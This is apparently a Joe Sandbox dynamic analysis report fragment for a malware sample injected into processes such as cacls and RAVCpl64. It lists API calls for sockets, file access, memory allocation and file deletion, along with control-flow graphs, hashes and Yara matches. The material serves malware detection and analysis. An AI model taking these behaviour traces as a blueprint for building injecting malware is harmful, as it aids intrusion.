                                                                                          • API String ID:

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: socket
                                                                                          • String ID:
                                                                                          • API String ID: 98920635-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: send
                                                                                          • String ID:
                                                                                          • API String ID: 2809346765-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: connect
                                                                                          • String ID:
                                                                                          • API String ID: 1959786783-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: connect
                                                                                          • String ID:
                                                                                          • API String ID: 1959786783-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: socket
                                                                                          • String ID:
                                                                                          • API String ID: 98920635-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: closesocket
                                                                                          • String ID:
                                                                                          • API String ID: 2781271927-0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:

                                                                                          Execution Graph

                                                                                          Execution Coverage:2.5%
                                                                                          Dynamic/Decrypted Code Coverage:3.3%
                                                                                          Signature Coverage:1.8%
                                                                                          Total number of Nodes:398
                                                                                          Total number of Limit Nodes:65
96515->96516 96518 681b10 96519 681b2c 96518->96519 96520 681b68 96519->96520 96521 681b54 96519->96521 96522 689870 NtClose 96520->96522 96523 689870 NtClose 96521->96523 96524 681b71 96522->96524 96525 681b5d 96523->96525 96528 68ba80 RtlAllocateHeap 96524->96528 96527 681b7c 96528->96527 96529 6897d0 96530 6897fb 96529->96530 96531 689847 96529->96531 96532 68985d NtDeleteFile 96531->96532 96533 67715a 96534 67712c 96533->96534 96537 67715f 96533->96537 96538 678280 96534->96538 96536 677134 96539 67829d 96538->96539 96545 688f90 96539->96545 96541 6782ed 96542 6782f4 96541->96542 96543 689070 LdrInitializeThunk 96541->96543 96542->96536 96544 67831d 96543->96544 96544->96536 96546 68902e 96545->96546 96548 688fbe 96545->96548 96550 2f22e50 LdrInitializeThunk 96546->96550 96547 689067 96547->96541 96548->96541 96550->96547
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 0067CA24
                                                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 0067CA5F
                                                                                          • FindClose.KERNELBASE(?), ref: 0067CA6A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 3541575487-0
                                                                                          APIs
                                                                                          • NtCreateFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?,?,?), ref: 00689661
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          APIs
                                                                                          • NtReadFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?), ref: 006897B9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileRead
                                                                                          • String ID:
                                                                                          • API String ID: 2738559852-0
                                                                                          APIs
                                                                                          • NtAllocateVirtualMemory.NTDLL(0067209E,?,0068834F,C3714B7A,00000004,00003000,?,?,?,?,?,0068834F,0067209E,0068B901,0068834F,520F8B51), ref: 00689A98
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateMemoryVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 2167126740-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          APIs
                                                                                          • NtClose.NTDLL(?,00673443,001F0001,?,00000000,?,?,00000104), ref: 006898A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: b2b0425965096aa1e9351ad7e7bf5107bb345553d1cad30bb3988b460983cfd5
                                                                                          • Instruction ID: 2cc137d025d1fc3908c9aa17a3bfc29af910d96b66856a1cd027a0de05964e04
                                                                                          • Opcode Fuzzy Hash: b2b0425965096aa1e9351ad7e7bf5107bb345553d1cad30bb3988b460983cfd5
                                                                                          • Instruction Fuzzy Hash: 0A90023120100802D58171584504A4B000587D1381F91C419B1015654DCA298A5977A1
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 04a2817b25780769febd0919c6fe4c9ea5de066328433415c84dbbd343bcfbaa
                                                                                          • Instruction ID: e1be43d6070e14cee3fa12361c54b3d76c975a0b078f0dbc1149b85290ae11ad
                                                                                          • Opcode Fuzzy Hash: 04a2817b25780769febd0919c6fe4c9ea5de066328433415c84dbbd343bcfbaa
                                                                                          • Instruction Fuzzy Hash: EB90023120504842D54171584504E47001587D0385F51C415B1054694DD6398D55B661
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 05fc8944941c975e4e6ba6fad2e69170d61feb38d6991a432e07bc9f2e870b72
                                                                                          • Instruction ID: a048fff3d9a3047178da8302290b64aef85860b2f0670c191a786dbdbb6178d2
                                                                                          • Opcode Fuzzy Hash: 05fc8944941c975e4e6ba6fad2e69170d61feb38d6991a432e07bc9f2e870b72
                                                                                          • Instruction Fuzzy Hash: 16900435311000030507F55C0704D070047C7D53D1351C435F3005550CD735CC717131
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: ccff96329ee02101834cfabfd51d28227e3630755f395e7383979f099c87de31
                                                                                          • Instruction ID: 2b024db89d0f33d6409922fa4816c0fdf69b7d10f7c6f32592ec418431632f39
                                                                                          • Opcode Fuzzy Hash: ccff96329ee02101834cfabfd51d28227e3630755f395e7383979f099c87de31
                                                                                          • Instruction Fuzzy Hash: F090026134100442D50161584514F070005C7E1381F51C419F2054554DC62DCC527126
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 1922e966983095e8e814f476ff67fc84479f818b98172a87bf6f12fe185c3be9
                                                                                          • Instruction ID: 53d2f5a1f1989356ea6492753c75dd852f71c0ae5f65bf4732179218504bfed3
                                                                                          • Opcode Fuzzy Hash: 1922e966983095e8e814f476ff67fc84479f818b98172a87bf6f12fe185c3be9
                                                                                          • Instruction Fuzzy Hash: 9090022121180042D60165684D14F07000587D0383F51C519B1144554CC92988616521
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: ae37d5e2946494f4015fd913547aee8c6855bbeffc703cdd49b008443906d357
                                                                                          • Instruction ID: f1a09bdfb2d8b82b19a194081e465d2f34fd33239dccd72841dbcaf48f2e7792
                                                                                          • Opcode Fuzzy Hash: ae37d5e2946494f4015fd913547aee8c6855bbeffc703cdd49b008443906d357
                                                                                          • Instruction Fuzzy Hash: E6900221242041525946B1584504907400697E02C1791C416B2404950CC53A9856E621
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 3992c62d2888999a26817e6ba8d07002dc728aeaf2b3b110b3d6b65217b79d69
                                                                                          • Instruction ID: 00fa2f5de95c6ea404a06863c79a90655c5921e49e0f17325f3fe116c735abed
                                                                                          • Opcode Fuzzy Hash: 3992c62d2888999a26817e6ba8d07002dc728aeaf2b3b110b3d6b65217b79d69
                                                                                          • Instruction Fuzzy Hash: 8F90022921300002D58171585508A0B000587D1282F91D819B1005558CC92988696321
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: a3ac9d98ad8caebd285c324baa9aa49dbc1580cbefa757fb266d02c9e7e515c4
                                                                                          • Instruction ID: 2bf4b5d737f7b3c5e4e57e85c774289517f224a48257960b8eb0bdb46fe3c41a
                                                                                          • Opcode Fuzzy Hash: a3ac9d98ad8caebd285c324baa9aa49dbc1580cbefa757fb266d02c9e7e515c4
                                                                                          • Instruction Fuzzy Hash: B190023120100413D51261584604B07000987D02C1F91C816B1414558DD66A8952B121
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: f98c16ecbcd5d1512b8db729621e528acc84cd3f55229d5735c72d3c0cf931d7
                                                                                          • Instruction ID: 63d88f1b617c34597a368daea5d0c3a1d12383aa530f37462c2ef9f2f951defa
                                                                                          • Opcode Fuzzy Hash: f98c16ecbcd5d1512b8db729621e528acc84cd3f55229d5735c72d3c0cf931d7
                                                                                          • Instruction Fuzzy Hash: E390023160510402D50161584614B07100587D0281F61C815B1414568DC7A9895175A2

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 271 683e10-683e58 call 68b8d0 274 683e5e-683ed8 call 68b9b0 call 674890 call 6613e0 call 681fe0 271->274 275 683f64-683f6a 271->275 284 683ee0-683ef4 Sleep 274->284 285 683f55-683f5c 284->285 286 683ef6-683f08 284->286 285->284 287 683f5e 285->287 288 683f2a-683f43 call 686370 286->288 289 683f0a-683f28 call 6862d0 286->289 287->275 293 683f48-683f4b 288->293 289->293 293->285
                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(000007D0), ref: 00683EEB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID: i:4$net.dll$wininet.dll
                                                                                          • API String ID: 3472027048-2634764057
                                                                                          • Opcode ID: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
                                                                                          • Instruction ID: 9c7d85080211a6592f0ec15f422667234c434729d4364d9eeb9e877f0622ceff
                                                                                          • Opcode Fuzzy Hash: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
                                                                                          • Instruction Fuzzy Hash: C7315EB1A00705BBD714EFA4D881FEAB7B9EB88710F04861DF65D6B241D7706B40CBA5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 294 670ffc-671016 295 671019-671054 294->295 296 671056 295->296 297 6710b4-67110a call 674890 call 6613e0 call 681fe0 295->297 299 671057-671058 296->299 314 67110c-67111b PostThreadMessageW 297->314 315 67112a-671130 297->315 301 671084 299->301 302 67105a-67106c 299->302 301->299 303 671085-671087 301->303 302->295 310 67106e-671075 302->310 305 671091 303->305 306 671089-671090 303->306 306->305 312 671077-671080 310->312 313 671082-671083 310->313 312->313 313->301 314->315 316 67111d-671127 314->316 316->315
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00671117
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: t577G2K6$t577G2K6
                                                                                          • API String ID: 1836367815-2667467881
                                                                                          • Opcode ID: 0552f22b151b17f9e535a8ed6bb9008edb1782d23ebd6ebc5d6af9584400a9a1
                                                                                          • Instruction ID: e445449024bd1b5c24a59af9f94e575dadd7e345c6c4b1280d5f052382d19cb7
                                                                                          • Opcode Fuzzy Hash: 0552f22b151b17f9e535a8ed6bb9008edb1782d23ebd6ebc5d6af9584400a9a1
                                                                                          • Instruction Fuzzy Hash: 6B31D172A012C47B8701DB799C42DDDBBA9EE533A471480AEED489F201D5268E038BD1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 317 671097-6710b2 318 6710ba-6710d2 call 68c410 317->318 319 6710b5 call 68ba00 317->319 322 6710d8-67110a call 6613e0 call 681fe0 318->322 323 6710d3 call 674890 318->323 319->318 328 67110c-67111b PostThreadMessageW 322->328 329 67112a-671130 322->329 323->322 328->329 330 67111d-671127 328->330 330->329
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00671117
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: t577G2K6$t577G2K6
                                                                                          • API String ID: 1836367815-2667467881
                                                                                          • Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                          • Instruction ID: 4cff56163677e11cf423acc19e0c84f4092c1d2157cc8653e906528464cefe60
                                                                                          • Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                          • Instruction Fuzzy Hash: 1111E9B1D4025C7EDB11EBE48C82DEFBB7CEF027A4F018169F654AB141E6345E068BA5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 331 6710a0-6710d2 call 68ba00 call 68c410 336 6710d8-67110a call 6613e0 call 681fe0 331->336 337 6710d3 call 674890 331->337 342 67110c-67111b PostThreadMessageW 336->342 343 67112a-671130 336->343 337->336 342->343 344 67111d-671127 342->344 344->343
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00671117
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: t577G2K6$t577G2K6
                                                                                          • API String ID: 1836367815-2667467881
                                                                                          • Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                          • Instruction ID: 9d7f8c09174cc03c32de988cecdfcb47f7edf0e232824cd0b580bd22a2668fe9
                                                                                          • Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                          • Instruction Fuzzy Hash: 1301C871D0024C7ADB11A6D48C81DEF7B7CDF426A4F048169FA14AB101E6245E0687B5
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InitializeUninitialize
                                                                                          • String ID: @J7<
                                                                                          • API String ID: 3442037557-2016760708
                                                                                          APIs
                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00672040,0068834F,00685A0E,00672006), ref: 006784E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
